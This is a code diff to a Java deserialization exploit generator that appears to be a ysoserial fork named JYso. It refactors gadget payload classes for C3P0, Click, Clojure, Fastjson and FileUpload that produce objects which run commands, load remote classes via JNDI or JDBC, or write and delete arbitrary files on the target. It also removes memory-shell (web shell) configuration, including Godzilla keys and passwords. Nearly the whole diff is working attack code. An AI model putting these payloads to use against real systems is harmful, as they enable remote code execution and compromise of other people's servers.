@@ -70,7 +68,7 @@ public class C3P04 implements ObjectPayload<Object> {
|
|||||||
this.cmd = cmd;
|
this.cmd = cmd;
|
||||||
}
|
}
|
||||||
|
|
||||||
public Reference getReference() throws NamingException {
|
public Reference getReference() {
|
||||||
|
|
||||||
String yaml = "";
|
String yaml = "";
|
||||||
|
|
||||||
@@ -127,29 +125,29 @@ public class C3P04 implements ObjectPayload<Object> {
|
|||||||
return ref;
|
return ref;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PrintWriter getLogWriter() throws SQLException {
|
public PrintWriter getLogWriter() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLogWriter(PrintWriter out) throws SQLException {
|
public void setLogWriter(PrintWriter out) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public int getLoginTimeout() throws SQLException {
|
public int getLoginTimeout() {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLoginTimeout(int seconds) throws SQLException {
|
public void setLoginTimeout(int seconds) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
|
public Logger getParentLogger() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection() throws SQLException {
|
public PooledConnection getPooledConnection() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
|
public PooledConnection getPooledConnection(String user, String password) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -9,14 +9,11 @@ import javassist.ClassClassPath;
|
|||||||
import javassist.ClassPool;
|
import javassist.ClassPool;
|
||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
|
|
||||||
import javax.naming.NamingException;
|
|
||||||
import javax.naming.Reference;
|
import javax.naming.Reference;
|
||||||
import javax.naming.Referenceable;
|
import javax.naming.Referenceable;
|
||||||
import javax.sql.ConnectionPoolDataSource;
|
import javax.sql.ConnectionPoolDataSource;
|
||||||
import javax.sql.PooledConnection;
|
import javax.sql.PooledConnection;
|
||||||
import java.io.PrintWriter;
|
import java.io.PrintWriter;
|
||||||
import java.sql.SQLException;
|
|
||||||
import java.sql.SQLFeatureNotSupportedException;
|
|
||||||
import java.util.logging.Logger;
|
import java.util.logging.Logger;
|
||||||
|
|
||||||
|
|
||||||
@@ -24,6 +21,7 @@ import java.util.logging.Logger;
|
|||||||
* C3P0 通过Tomcat 的 getObjectInstance 方法调用 ELProcessor 的 eval 方法实现表达式注入
|
* C3P0 通过Tomcat 的 getObjectInstance 方法调用 ELProcessor 的 eval 方法实现表达式注入
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8", "com.mchange:mchange-commons-java:0.2.11"})
|
@Dependencies({"com.mchange:c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8", "com.mchange:mchange-commons-java:0.2.11"})
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class C3P092 implements ObjectPayload<Object> {
|
public class C3P092 implements ObjectPayload<Object> {
|
||||||
@@ -56,42 +54,42 @@ public class C3P092 implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
|
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
|
||||||
|
|
||||||
private String className;
|
private final String className;
|
||||||
|
|
||||||
private String url;
|
private final String url;
|
||||||
|
|
||||||
public PoolSource(String className, String url) {
|
public PoolSource(String className, String url) {
|
||||||
this.className = className;
|
this.className = className;
|
||||||
this.url = url;
|
this.url = url;
|
||||||
}
|
}
|
||||||
|
|
||||||
public Reference getReference() throws NamingException {
|
public Reference getReference() {
|
||||||
return new Reference("exploit", this.className, this.url);
|
return new Reference("exploit", this.className, this.url);
|
||||||
}
|
}
|
||||||
|
|
||||||
public PrintWriter getLogWriter() throws SQLException {
|
public PrintWriter getLogWriter() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLogWriter(PrintWriter out) throws SQLException {
|
public void setLogWriter(PrintWriter out) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public int getLoginTimeout() throws SQLException {
|
public int getLoginTimeout() {
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
public void setLoginTimeout(int seconds) throws SQLException {
|
public void setLoginTimeout(int seconds) {
|
||||||
}
|
}
|
||||||
|
|
||||||
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
|
public Logger getParentLogger() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection() throws SQLException {
|
public PooledConnection getPooledConnection() {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
|
public PooledConnection getPooledConnection(String user, String password) {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -9,16 +9,12 @@ import javax.management.BadAttributeValueExpException;
|
|||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
||||||
@Authors({Authors.UNAM4})
|
@Authors({Authors.UNAM4})
|
||||||
public class C3P0JDBC implements ObjectPayload<Object> {
|
public class C3P0JDBC implements ObjectPayload<Object> {
|
||||||
//private static String cmd = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
|
|
||||||
// "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
|
|
||||||
// "java.lang.Runtime.getRuntime().exec('open -a calculator')\n" +
|
|
||||||
// "$$\n";
|
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|
||||||
if (!command.toLowerCase().startsWith("jdbc:")) {
|
if (!command.toLowerCase().startsWith("jdbc:")) {
|
||||||
throw new Exception("Command format is: eviljdbcurl");
|
throw new Exception("Command format is: eviljdbcurl");
|
||||||
}
|
}
|
||||||
@@ -36,7 +32,7 @@ public class C3P0JDBC implements ObjectPayload<Object> {
|
|||||||
valfield.setAccessible(true);
|
valfield.setAccessible(true);
|
||||||
valfield.set(val, jsonArray);
|
valfield.set(val, jsonArray);
|
||||||
|
|
||||||
HashMap hashMap = new HashMap();
|
HashMap<ComboPooledDataSource, BadAttributeValueExpException> hashMap = new HashMap<>();
|
||||||
hashMap.put(o, val);
|
hashMap.put(o, val);
|
||||||
return hashMap;
|
return hashMap;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import javax.management.BadAttributeValueExpException;
|
|||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
||||||
@Authors({Authors.UNAM4})
|
@Authors({Authors.UNAM4})
|
||||||
public class C3P0JNDI implements ObjectPayload<Object> {
|
public class C3P0JNDI implements ObjectPayload<Object> {
|
||||||
@@ -33,7 +34,7 @@ public class C3P0JNDI implements ObjectPayload<Object> {
|
|||||||
valfield.setAccessible(true);
|
valfield.setAccessible(true);
|
||||||
valfield.set(val, jsonArray);
|
valfield.set(val, jsonArray);
|
||||||
|
|
||||||
HashMap hashMap = new HashMap();
|
HashMap<Object, BadAttributeValueExpException> hashMap = new HashMap<>();
|
||||||
hashMap.put(o, val);
|
hashMap.put(o, val);
|
||||||
return hashMap;
|
return hashMap;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import javax.management.BadAttributeValueExpException;
|
|||||||
import java.lang.reflect.Field;
|
import java.lang.reflect.Field;
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
@Dependencies({"com.mchange:c3p0:0.9.5.2", "com.alibaba.fastjson:com.alibaba.fastjson1.X"})
|
||||||
@Authors({Authors.UNAM4})
|
@Authors({Authors.UNAM4})
|
||||||
public class C3P0JNDI2 implements ObjectPayload<Object> {
|
public class C3P0JNDI2 implements ObjectPayload<Object> {
|
||||||
@@ -32,7 +33,7 @@ public class C3P0JNDI2 implements ObjectPayload<Object> {
|
|||||||
valfield.setAccessible(true);
|
valfield.setAccessible(true);
|
||||||
valfield.set(val, jsonArray);
|
valfield.set(val, jsonArray);
|
||||||
|
|
||||||
HashMap hashMap = new HashMap();
|
HashMap<JndiRefConnectionPoolDataSource, BadAttributeValueExpException> hashMap = new HashMap<>();
|
||||||
hashMap.put(o, val);
|
hashMap.put(o, val);
|
||||||
return hashMap;
|
return hashMap;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1,13 +1,15 @@
|
|||||||
package com.qi4l.JYso.gadgets;
|
package com.qi4l.JYso.gadgets;
|
||||||
|
|
||||||
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
public class C3P0RefDataSource implements ObjectPayload {
|
public class C3P0RefDataSource implements ObjectPayload {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
// Object obj = Reflections.createWithoutConstructor(Class.forName("com.mchange.v2.c3p0.JndiRefForwardingDataSource"));
|
Object obj = Reflections.createWithoutConstructor(Class.forName("com.mchange.v2.c3p0.JndiRefForwardingDataSource"));
|
||||||
// // requires ordering
|
// requires ordering
|
||||||
// Reflections.setFieldValue(obj, "jndiName", command);
|
Reflections.setFieldValue(obj, "jndiName", command);
|
||||||
// Reflections.setFieldValue(obj, "loginTimeout", 0);
|
Reflections.setFieldValue(obj, "loginTimeout", 0);
|
||||||
// return obj;
|
return obj;
|
||||||
return null;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -14,6 +14,7 @@ import java.lang.reflect.InvocationTargetException;
|
|||||||
import java.net.URI;
|
import java.net.URI;
|
||||||
import java.util.Hashtable;
|
import java.util.Hashtable;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class C3P0WrapperConnPool implements ObjectPayload<Object> {
|
public class C3P0WrapperConnPool implements ObjectPayload<Object> {
|
||||||
public static String makeC3P0UserOverridesString(String codebase, String clazz) throws ClassNotFoundException, NoSuchMethodException,
|
public static String makeC3P0UserOverridesString(String codebase, String clazz) throws ClassNotFoundException, NoSuchMethodException,
|
||||||
InstantiationException, IllegalAccessException, InvocationTargetException, IOException {
|
InstantiationException, IllegalAccessException, InvocationTargetException, IOException {
|
||||||
@@ -33,7 +34,7 @@ public class C3P0WrapperConnPool implements ObjectPayload<Object> {
|
|||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
URI uri = new URI(command);
|
URI uri = new URI(command);
|
||||||
String args[] = {uri.getScheme() + "://" + uri.getAuthority(), uri.getPath().substring(1)};
|
String[] args = {uri.getScheme() + "://" + uri.getAuthority(), uri.getPath().substring(1)};
|
||||||
WrapperConnectionPoolDataSource obj = Reflections.createWithoutConstructor(WrapperConnectionPoolDataSource.class);
|
WrapperConnectionPoolDataSource obj = Reflections.createWithoutConstructor(WrapperConnectionPoolDataSource.class);
|
||||||
Reflections.setFieldValue(obj, "userOverridesAsString", makeC3P0UserOverridesString(args[0], args[1]));
|
Reflections.setFieldValue(obj, "userOverridesAsString", makeC3P0UserOverridesString(args[0], args[1]));
|
||||||
return obj;
|
return obj;
|
||||||
|
|||||||
@@ -45,7 +45,7 @@ import java.util.PriorityQueue;
|
|||||||
* by @artsploit
|
* by @artsploit
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.apache.click:click-nodeps:2.3.0", "javax.servlet:javax.servlet-api:3.1.0"})
|
@Dependencies({"org.apache.click:click-nodeps:2.3.0", "javax.servlet:javax.servlet-api:3.1.0"})
|
||||||
@Authors({Authors.ARTSPLOIT})
|
@Authors({Authors.ARTSPLOIT})
|
||||||
public class Click1 implements ObjectPayload<Object> {
|
public class Click1 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -28,6 +28,7 @@ import static com.qi4l.JYso.gadgets.annotation.Authors.JACKOFMOSTTRADES;
|
|||||||
* Versions since 1.2.0 are vulnerable, although some class names may need to be changed for other versions
|
* Versions since 1.2.0 are vulnerable, although some class names may need to be changed for other versions
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"org.clojure:clojure:1.8.0"})
|
@Dependencies({"org.clojure:clojure:1.8.0"})
|
||||||
@Authors({JACKOFMOSTTRADES})
|
@Authors({JACKOFMOSTTRADES})
|
||||||
public class Clojure implements ObjectPayload<Map<?, ?>> {
|
public class Clojure implements ObjectPayload<Map<?, ?>> {
|
||||||
|
|||||||
@@ -62,28 +62,6 @@ public class Config {
|
|||||||
public static Boolean IS_INHERIT_ABSTRACT_TRANSLET = false;
|
public static Boolean IS_INHERIT_ABSTRACT_TRANSLET = false;
|
||||||
//是否使用反射绕过RASP
|
//是否使用反射绕过RASP
|
||||||
public static Boolean IS_OBSCURE = false;
|
public static Boolean IS_OBSCURE = false;
|
||||||
// 各种方式的内存马映射的路径
|
|
||||||
public static String URL_PATTERN = "/qi4l";
|
|
||||||
// 是否使用落地文件的方式隐藏内存马
|
|
||||||
public static Boolean HIDE_MEMORY_SHELL = false;
|
|
||||||
// 是否生成内存马文件
|
|
||||||
public static Boolean GEN_MEM_SHELL = false;
|
|
||||||
// 内存马文件名
|
|
||||||
public static String GEN_MEM_SHELL_FILENAME = "";
|
|
||||||
// 落地文件姿势,1 charsets.jar 2 classes
|
|
||||||
public static int HIDE_MEMORY_SHELL_TYPE = 0;
|
|
||||||
// 内存马的密码MD5
|
|
||||||
public static String PASSWORD = "0f359740bd1cda99";
|
|
||||||
// Referer 校验
|
|
||||||
public static String HEADER_KEY = "Referer";
|
|
||||||
// 用于额外校验的 Http Header 值,默认值 https://QI4L.cn/
|
|
||||||
public static String HEADER_VALUE = "https://QI4L.cn/";
|
|
||||||
// 哥斯拉的 key,默认是 key
|
|
||||||
public static String GODZILLA_KEY = "3c6e0b8a9c15224a";
|
|
||||||
// 密码原文
|
|
||||||
public static String PASSWORD_ORI = "p@ssw0rd";
|
|
||||||
// 命令执行回显时,传递执行命令的 Header 头
|
|
||||||
public static String CMD_HEADER_STRING = "X-Token-Data";
|
|
||||||
// 是否在序列化数据流中的 TC_RESET 中填充脏数据
|
// 是否在序列化数据流中的 TC_RESET 中填充脏数据
|
||||||
public static Boolean IS_DIRTY_IN_TC_RESET = false;
|
public static Boolean IS_DIRTY_IN_TC_RESET = false;
|
||||||
public static Boolean IS_UTF_Bypass = false;
|
public static Boolean IS_UTF_Bypass = false;
|
||||||
@@ -103,30 +81,9 @@ public class Config {
|
|||||||
// ScriptEngineManager 是否为 RHINO 引擎
|
// ScriptEngineManager 是否为 RHINO 引擎
|
||||||
public static boolean USING_RHINO = false;
|
public static boolean USING_RHINO = false;
|
||||||
public static ClassPool POOL = ClassPool.getDefault();
|
public static ClassPool POOL = ClassPool.getDefault();
|
||||||
// 不同类型内存马的父类/接口与其关键参数的映射
|
|
||||||
public static HashMap<String, String> KEY_METHOD_MAP = new HashMap<>();
|
|
||||||
@Parameter(names = {"-h", " --help"}, help = true, description = "Show this help")
|
@Parameter(names = {"-h", " --help"}, help = true, description = "Show this help")
|
||||||
private static boolean help = false;
|
private static boolean help = false;
|
||||||
|
|
||||||
static {
|
|
||||||
// Servlet 型内存马,关键方法 service
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.Servlet", "service");
|
|
||||||
// Filter 型内存马,关键方法 doFilter
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.Filter", "doFilter");
|
|
||||||
// Listener 型内存马,通常使用 ServletRequestListener, 关键方法 requestInitializedHandle
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.ServletRequestListener", "requestInitializedHandle");
|
|
||||||
// Websocket 型内存马,关键方法 onMessage
|
|
||||||
KEY_METHOD_MAP.put("javax.websocket.MessageHandler$Whole", "onMessage");
|
|
||||||
// Tomcat Upgrade 型内存马,关键方法 accept
|
|
||||||
KEY_METHOD_MAP.put("org.apache.coyote.UpgradeProtocol", "accept");
|
|
||||||
// Tomcat Executor 型内存马,关键方法 execute
|
|
||||||
KEY_METHOD_MAP.put("org.apache.tomcat.util.threads.ThreadPoolExecutor", "execute");
|
|
||||||
// Spring Interceptor 型内存马,关键方法 preHandle
|
|
||||||
KEY_METHOD_MAP.put("org.springframework.web.servlet.handler.HandlerInterceptorAdapter", "preHandle");
|
|
||||||
// Webflux 内存马
|
|
||||||
KEY_METHOD_MAP.put("org.springframework.web.server.WebFilter", "executePayload");
|
|
||||||
}
|
|
||||||
|
|
||||||
@SuppressWarnings({"InstantiationOfUtilityClass","HttpUrlsUsage"})
|
@SuppressWarnings({"InstantiationOfUtilityClass","HttpUrlsUsage"})
|
||||||
public static void applyCmdArgs(String[] args) {
|
public static void applyCmdArgs(String[] args) {
|
||||||
//process cmd args
|
//process cmd args
|
||||||
@@ -183,23 +140,6 @@ public class Config {
|
|||||||
Config.codeBase = "http://" + Config.ip + ":" + Config.httpPort + "/";
|
Config.codeBase = "http://" + Config.ip + ":" + Config.httpPort + "/";
|
||||||
}
|
}
|
||||||
|
|
||||||
public static void init() {
|
|
||||||
// Servlet 型内存马,关键方法 service
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.Servlet", "service");
|
|
||||||
// Filter 型内存马,关键方法 doFilter
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.Filter", "doFilter");
|
|
||||||
// Listener 型内存马,通常使用 ServletRequestListener, 关键方法 requestInitializedHandle
|
|
||||||
KEY_METHOD_MAP.put("javax.servlet.ServletRequestListener", "requestInitializedHandle");
|
|
||||||
// Websocket 型内存马,关键方法 onMessage
|
|
||||||
KEY_METHOD_MAP.put("javax.websocket.MessageHandler█Whole", "onMessage");
|
|
||||||
// Tomcat Upgrade 型内存马,关键方法 accept
|
|
||||||
KEY_METHOD_MAP.put("org.apache.coyote.UpgradeProtocol", "accept");
|
|
||||||
// Tomcat Executor 型内存马,关键方法 execute
|
|
||||||
KEY_METHOD_MAP.put("org.apache.tomcat.util.threads.ThreadPoolExecutor", "execute");
|
|
||||||
// Spring Interceptor 型内存马,关键方法 preHandle
|
|
||||||
KEY_METHOD_MAP.put("org.springframework.web.servlet.handler.HandlerInterceptorAdapter", "preHandle");
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void logo() {
|
public static void logo() {
|
||||||
String logo = " ┏┳┓┏ \n" +
|
String logo = " ┏┳┓┏ \n" +
|
||||||
" ┃┗┫┏┏┓ \n" +
|
" ┃┗┫┏┏┓ \n" +
|
||||||
|
|||||||
@@ -17,7 +17,6 @@ import java.nio.file.Paths;
|
|||||||
import java.util.*;
|
import java.util.*;
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.Config.Config.logo;
|
import static com.qi4l.JYso.gadgets.Config.Config.logo;
|
||||||
import static com.qi4l.JYso.gadgets.utils.HexUtils.generatePassword;
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.StringUtil.isFromExploit;
|
import static com.qi4l.JYso.gadgets.utils.StringUtil.isFromExploit;
|
||||||
|
|
||||||
public class ysoserial {
|
public class ysoserial {
|
||||||
@@ -52,18 +51,6 @@ public class ysoserial {
|
|||||||
Config.IS_OBSCURE = true;
|
Config.IS_OBSCURE = true;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (cmdLine.hasOption("cmd-header")) {
|
|
||||||
Config.CMD_HEADER_STRING = cmdLine.getOptionValue("cmd-header");
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("url")) {
|
|
||||||
String url = cmdLine.getOptionValue("url");
|
|
||||||
if (!url.startsWith("/")) {
|
|
||||||
url = "/" + url;
|
|
||||||
}
|
|
||||||
Config.URL_PATTERN = url;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("define-class-from-parameter")) {
|
if (cmdLine.hasOption("define-class-from-parameter")) {
|
||||||
Config.PARAMETER = cmdLine.getOptionValue("define-class-from-parameter");
|
Config.PARAMETER = cmdLine.getOptionValue("define-class-from-parameter");
|
||||||
}
|
}
|
||||||
@@ -77,23 +64,6 @@ public class ysoserial {
|
|||||||
Config.BASE64 = true;
|
Config.BASE64 = true;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (cmdLine.hasOption("password")) {
|
|
||||||
Config.PASSWORD_ORI = cmdLine.getOptionValue("password");
|
|
||||||
Config.PASSWORD = generatePassword(Config.PASSWORD_ORI);
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("godzilla-key")) {
|
|
||||||
Config.GODZILLA_KEY = generatePassword(cmdLine.getOptionValue("godzilla-key"));
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("header-key")) {
|
|
||||||
Config.HEADER_KEY = cmdLine.getOptionValue("header-key");
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("header-value")) {
|
|
||||||
Config.HEADER_VALUE = cmdLine.getOptionValue("header-value");
|
|
||||||
}
|
|
||||||
|
|
||||||
if (cmdLine.hasOption("no-com-sun")) {
|
if (cmdLine.hasOption("no-com-sun")) {
|
||||||
Config.FORCE_USING_ORG_APACHE_TEMPLATESIMPL = true;
|
Config.FORCE_USING_ORG_APACHE_TEMPLATESIMPL = true;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -12,6 +12,7 @@ import java.lang.reflect.Field;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
|
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class Fastjson1 implements ObjectPayload<Object> {
|
public class Fastjson1 implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
@@ -22,9 +23,12 @@ public class Fastjson1 implements ObjectPayload<Object> {
|
|||||||
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
|
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
|
||||||
constructor.setBody("Runtime.getRuntime().exec(\"open -na Calculator\");");
|
constructor.setBody("Runtime.getRuntime().exec(\"open -na Calculator\");");
|
||||||
clazz.addConstructor(constructor);
|
clazz.addConstructor(constructor);
|
||||||
final Object templates;
|
Object templates = Gadgets.createTemplatesImpl(command);
|
||||||
templates = Gadgets.createTemplatesImpl(command);
|
|
||||||
|
|
||||||
|
return getFastjsonSink(templates);
|
||||||
|
}
|
||||||
|
|
||||||
|
static Object getFastjsonSink(Object templates) throws Exception {
|
||||||
JSONArray jsonArray = new JSONArray();
|
JSONArray jsonArray = new JSONArray();
|
||||||
jsonArray.add(templates);
|
jsonArray.add(templates);
|
||||||
|
|
||||||
|
|||||||
@@ -1,40 +0,0 @@
|
|||||||
package com.qi4l.JYso.gadgets;
|
|
||||||
|
|
||||||
import com.alibaba.fastjson2.JSONArray;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
|
||||||
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
|
|
||||||
import javassist.ClassPool;
|
|
||||||
import javassist.CtClass;
|
|
||||||
import javassist.CtConstructor;
|
|
||||||
|
|
||||||
import javax.management.BadAttributeValueExpException;
|
|
||||||
import java.lang.reflect.Field;
|
|
||||||
import java.util.HashMap;
|
|
||||||
|
|
||||||
|
|
||||||
public class Fastjson2 implements ObjectPayload<Object> {
|
|
||||||
@Override
|
|
||||||
public Object getObject(String command) throws Exception {
|
|
||||||
ClassPool pool = ClassPool.getDefault();
|
|
||||||
CtClass clazz = pool.makeClass("a");
|
|
||||||
CtClass superClass = pool.get(AbstractTranslet.class.getName());
|
|
||||||
clazz.setSuperclass(superClass);
|
|
||||||
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
|
|
||||||
constructor.setBody("Runtime.getRuntime().exec(\"open -na Calculator\");");
|
|
||||||
clazz.addConstructor(constructor);
|
|
||||||
final Object templates;
|
|
||||||
templates = Gadgets.createTemplatesImpl(command);
|
|
||||||
|
|
||||||
JSONArray jsonArray = new JSONArray();
|
|
||||||
jsonArray.add(templates);
|
|
||||||
|
|
||||||
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
|
|
||||||
Field valfield = val.getClass().getDeclaredField("val");
|
|
||||||
valfield.setAccessible(true);
|
|
||||||
valfield.set(val, jsonArray);
|
|
||||||
|
|
||||||
HashMap hashMap = new HashMap();
|
|
||||||
hashMap.put(templates, val);
|
|
||||||
return hashMap;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
@@ -7,26 +7,27 @@ import org.apache.commons.io.output.DeferredFileOutputStream;
|
|||||||
import org.apache.commons.io.output.ThresholdingOutputStream;
|
import org.apache.commons.io.output.ThresholdingOutputStream;
|
||||||
|
|
||||||
import java.io.File;
|
import java.io.File;
|
||||||
import java.io.IOException;
|
|
||||||
import java.io.OutputStream;
|
import java.io.OutputStream;
|
||||||
|
import java.nio.charset.StandardCharsets;
|
||||||
import java.util.Arrays;
|
import java.util.Arrays;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
public class FileUpload1 implements ReleaseableObjectPayload<DiskFileItem> {
|
public class FileUpload1 implements ReleaseableObjectPayload<DiskFileItem> {
|
||||||
private static DiskFileItem copyAndDelete(String copyAndDelete, String copyTo) throws IOException, Exception {
|
private static DiskFileItem copyAndDelete(String copyAndDelete, String copyTo) throws Exception {
|
||||||
return makePayload(0, copyTo, copyAndDelete, new byte[1]);
|
return makePayload(0, copyTo, copyAndDelete, new byte[1]);
|
||||||
}
|
}
|
||||||
|
|
||||||
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
|
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
|
||||||
private static DiskFileItem write(String dir, byte[] data) throws IOException, Exception {
|
private static DiskFileItem write(String dir, byte[] data) throws Exception {
|
||||||
return makePayload(data.length + 1, dir, dir + "/whatever", data);
|
return makePayload(data.length + 1, dir, dir + "/whatever", data);
|
||||||
}
|
}
|
||||||
|
|
||||||
// writes data to an arbitrary file
|
// writes data to an arbitrary file
|
||||||
private static DiskFileItem writePre131(String file, byte[] data) throws IOException, Exception {
|
private static DiskFileItem writePre131(String file, byte[] data) throws Exception {
|
||||||
return makePayload(data.length + 1, file + "\0", file, data);
|
return makePayload(data.length + 1, file + "\0", file, data);
|
||||||
}
|
}
|
||||||
|
|
||||||
private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception {
|
public static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws Exception {
|
||||||
// if thresh < written length, delete outputFile after copying to repository temp file
|
// if thresh < written length, delete outputFile after copying to repository temp file
|
||||||
// otherwise write the contents to repository temp file
|
// otherwise write the contents to repository temp file
|
||||||
File repository = new File(repoPath);
|
File repository = new File(repoPath);
|
||||||
@@ -49,11 +50,11 @@ public class FileUpload1 implements ReleaseableObjectPayload<DiskFileItem> {
|
|||||||
if (parts.length == 3 && "copyAndDelete".equals(parts[0])) {
|
if (parts.length == 3 && "copyAndDelete".equals(parts[0])) {
|
||||||
return copyAndDelete(parts[1], parts[2]);
|
return copyAndDelete(parts[1], parts[2]);
|
||||||
} else if (parts.length == 3 && "write".equals(parts[0])) {
|
} else if (parts.length == 3 && "write".equals(parts[0])) {
|
||||||
return write(parts[1], parts[2].getBytes("US-ASCII"));
|
return write(parts[1], parts[2].getBytes(StandardCharsets.US_ASCII));
|
||||||
} else if (parts.length == 3 && "writeB64".equals(parts[0])) {
|
} else if (parts.length == 3 && "writeB64".equals(parts[0])) {
|
||||||
return write(parts[1], Base64.decodeBase64(parts[2]));
|
return write(parts[1], Base64.decodeBase64(parts[2]));
|
||||||
} else if (parts.length == 3 && "writeOld".equals(parts[0])) {
|
} else if (parts.length == 3 && "writeOld".equals(parts[0])) {
|
||||||
return writePre131(parts[1], parts[2].getBytes("US-ASCII"));
|
return writePre131(parts[1], parts[2].getBytes(StandardCharsets.US_ASCII));
|
||||||
} else if (parts.length == 3 && "writeOldB64".equals(parts[0])) {
|
} else if (parts.length == 3 && "writeOldB64".equals(parts[0])) {
|
||||||
return writePre131(parts[1], Base64.decodeBase64(parts[2]));
|
return writePre131(parts[1], Base64.decodeBase64(parts[2]));
|
||||||
} else {
|
